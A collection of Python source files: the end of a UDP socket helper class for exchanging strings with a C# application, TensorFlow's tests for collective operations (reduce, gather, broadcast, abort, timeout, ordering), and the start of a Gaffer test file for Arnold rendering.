self.udpSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # allows the address/port to be reused immediately instead of it being stuck in the TIME_WAIT state waiting for late packets to arrive.
self.udpSock.bind((udpIP, portRX))
# Create Receiving thread if required
if enableRX:
import threading
self.rxThread = threading.Thread(target=self.ReadUdpThreadFunc, daemon=True)
self.rxThread.start()
def __del__(self):
self.CloseSocket()
def CloseSocket(self):
# Function to close socket
self.udpSock.close()
def SendData(self, strToSend):
# Use this function to send string to C#
self.udpSock.sendto(bytes(strToSend,'utf-8'), (self.udpIP, self.udpSendPort))
def ReceiveData(self):
"""
Should not be called by user
Function BLOCKS until data is returned from C#. It then attempts to convert it to string and returns on successful conversion.
An warning/error is raised if:
- Warning: Not connected to C# application yet. Warning can be suppressed by setting suppressWarning=True in constructor
- Error: If data receiving procedure or conversion to string goes wrong
- Error: If user attempts to use this without enabling RX
:return: returns None on failure or the received string on success
"""
if not self.enableRX: # if RX is not enabled, raise error
raise ValueError("Attempting to receive data without enabling this setting. Ensure this is enabled from the constructor")
data = None
try:
data, _ = self.udpSock.recvfrom(1024)
data = data.decode('utf-8')
except WindowsError as e:
if e.winerror == 10054: # An error occurs if you try to receive before connecting to other application
if not self.suppressWarnings:
print("Are You connected to the other application? Connect to it!")
else:
pass
else:
raise ValueError("Unexpected Error. Are you sure that the received data can be converted to a string")
return data
def ReadUdpThreadFunc(self): # Should be called from thread
"""
This function should be called from a thread [Done automatically via constructor]
(import threading -> e.g. udpReceiveThread = threading.Thread(target=self.ReadUdpNonBlocking, daemon=True))
This function keeps looping through the BLOCKING ReceiveData function and sets self.dataRX when data is received and sets received flag
This function runs in the background and updates class variables to read data later
"""
self.isDataReceived = False # Initially nothing received
while True:
data = self.ReceiveData() # Blocks (in thread) until data is returned (OR MAYBE UNTIL SOME TIMEOUT AS WELL)
self.dataRX = data # Populate AFTER new data is received
self.isDataReceived = True
# When it reaches here, data received is available
def ReadReceivedData(self):
"""
This is the function that should be used to read received data
Checks if data has been received SINCE LAST CALL, if so it returns the received string and sets flag to False (to avoid re-reading received data)
data is None if nothing has been received
:return:
"""
data = None
if self.isDataReceived: # if data has been received
self.isDataReceived = False
data = self.dataRX
self.dataRX = None # Empty receive buffer
return data
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key=100,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key=200,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testCollectiveInvalidKey(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with self.assertRaisesRegex(
errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
' got type 2 and data_type 1'):
with ops.device(dev0):
collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there's no active collective ops. There could be
# exceptions like EOF which we expect users to catch, aborting collective
# ops on all op errors intervenes with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there're active collective ops at the time of
# an op error. This is due to the inability to cancel collective ops, and op
# errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there're active collective ops at
# the time of an op error. We rely cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
ArnoldRenderTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import IECore
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.deregisterAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addMember( "renderDirectory", self.temporaryDirectory() + "/renderTests" )
s["variables"].addMember( "assDirectory", self.temporaryDirectory() + "/assTests" )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Display(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
